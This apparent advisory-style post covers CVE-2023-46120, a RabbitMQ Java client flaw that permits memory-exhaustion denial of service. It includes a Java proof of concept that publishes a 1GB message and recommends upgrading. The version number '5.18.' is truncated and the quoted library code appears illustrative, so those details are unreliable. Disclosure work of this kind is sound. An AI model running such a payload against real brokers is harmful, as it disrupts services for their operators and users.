CVE-2023-46120 - RabbitMQ Java Client's Memory Overflow Vulnerability Allows Remote Denial of Service (DoS) Attacks

RabbitMQ, a widely used message broker, provides Java and JVM-based applications the ability to connect and interact with RabbitMQ nodes using its Java client library. A recently discovered vulnerability in the RabbitMQ Java client library (prior to version 5.18.) allows potential attackers to exploit this weakness and execute Denial of Service (DoS) attacks, causing a memory overflow and triggering an Out Of Memory (OOM) error. This post presents an in-depth discussion of this vulnerability, including code snippets, links to original references, and details on how to mitigate the risk.

Vulnerability Details

The primary cause of this vulnerability lies in the Delivery class's implementation when receiving Message objects. The specified maxBodyLength parameter was not taken into account, which results in the application becoming vulnerable to memory overflow when processing excessively large Message objects.

The following code snippet demonstrates how the maxBodyLength parameter is not properly enforced

public class Delivery {
    public Delivery(Channel channel, long deliveryTag, boolean redelivered, String exchange, String routingKey, AMQP.BasicProperties props, byte[] body){
        this.channel = channel;
        this.deliveryTag = deliveryTag;
        this.redelivered = redelivered;
        // maxBodyLength is not used in the constructor
        this.body = body;
    }
}

Potential attackers could exploit this vulnerability by crafting a malicious message with an oversized payload, as shown in the code snippet below:

public class Attack {
    public static void main(String[] args) {
        ConnectionFactory factory = new ConnectionFactory();
        factory.setHost("localhost");

        try (Connection connection = factory.newConnection();
             Channel channel = connection.createChannel()) {
            channel.queueDeclare("queue", false, false, false, null);

            byte[] largeMessage = new byte[1024 * 1024 * 1024]; // 1GB payload
            java.util.Arrays.fill(largeMessage, (byte) 'A');

            channel.basicPublish("", "queue", null, largeMessage);
            System.out.println("Sent malicious message with large payload");
        } catch (IOException | TimeoutException e) {
            e.printStackTrace();
        }
    }
}

When processing the malicious message, the RabbitMQ Java client will suffer a memory overflow, and the OOM error will occur, resulting in a DoS attack.

Original References

1. CVE-2023-46120
2. RabbitMQ Java Client Library Documentation

Vulnerability Patch

The RabbitMQ Java client library vulnerability has been fixed in version 5.18., which introduced a correct enforcement of the maxBodyLength parameter. Users are strongly recommended to upgrade their RabbitMQ Java client library to at least version 5.18. to mitigate this risk.

In conclusion, users of RabbitMQ Java client library need to be aware of this vulnerability and take appropriate action by updating their library to the latest version. By doing so, they can protect their systems from potential DoS attacks and ensure a more secure and reliable messaging platform.

Timeline

Published on: 10/25/2023 18:17:00 UTC
Last modified on: 11/01/2023 16:42:00 UTC